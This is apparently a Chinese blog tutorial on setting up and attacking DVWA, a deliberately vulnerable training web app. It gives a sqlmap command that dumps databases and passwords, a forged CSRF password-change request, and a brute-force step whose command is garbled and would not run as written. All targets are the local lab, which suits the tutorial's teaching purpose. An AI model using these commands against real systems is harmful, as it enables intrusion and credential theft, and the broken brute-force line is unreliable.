DVWA通关教程:从安装到破解(CSDN博客)

一、DVWA安装教程

1、首先下载DVWA压缩包,解压到Web服务器的www目录下;

cd /var/www/
wget https://github.com/ethicalhack3r/DVWA/archive/master.zip
unzip master.zip
mv DVWA-master dvwa
cd dvwa
cp config/config.inc.php.dist config/config.inc.php

2、修改配置文件中的相关设置;

vim config/config.inc.php

3、在浏览器中访问localhost/dvwa/setup.php,进行DVWA的设置

二、DVWA通关

1、注入攻击:打开DVWA的SQL Injection模块,使用工具进行注入攻击,获得管理员权限。

sqlmap -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --level=5 --risk=3 --dbms=mysql --os=linux --current-db --current-user --passwords --dump

2、XSS攻击:打开DVWA的XSS Reflected模块,尝试在输入框输入JavaScript代码,以达到攻击效果。

3、CSRF攻击:使用BurpSuite进行攻击,构造Post请求,模拟受害者在攻击网站中执行此请求,达到攻击效果。

POST /dvwa/vulnerabilities/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/dvwa/vulnerabilities/csrf/

security=low&form=submit&password_new=test&password_conf=test

三、DVWA全级别教程

1、低安全性:完成注入攻击,获取管理员权限。

2、中等安全性:尝试注入攻击失败,需要使用布尔盲注等更高级的攻击方式。

3、高安全性:禁用一些常用的攻击方式,需要使用更加高级的攻击方式在系统中进行攻击。

四、DVWA搭建教程

在本地或者云服务器上安装Web服务器,按照上述方法安装DVWA,即可进行DVWA靶场的搭建。

五、DVWA靶场过关教程

根据DVWA的说明文档,逐个完成相关模块的攻击过关。

六、DVWA教程

通过DVWA,了解如何攻击和防御Web系统常见的漏洞,提升攻防水平。

七、DVWA暴力破解教程

使用工具进行暴力破解,例如使用BurpSuite,构造额外有指定字典和延迟时间的暴力破解请求:

python3 /root/tools/Seclists/Passwords/darkweb2017-top10000.txt /root/tools/Seclists/Passwords/darkweb2017-top10000.txt 4 'http://localhost:80/dvwa/vulnerabilities/brute/?username=admin&password=FUZZ&Login=Login&user_token=717bfe2f186df7252886661a62ab8cc2' brute-force

Published by

风君子

独自遨游何稽首 揭天掀地慰生平

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注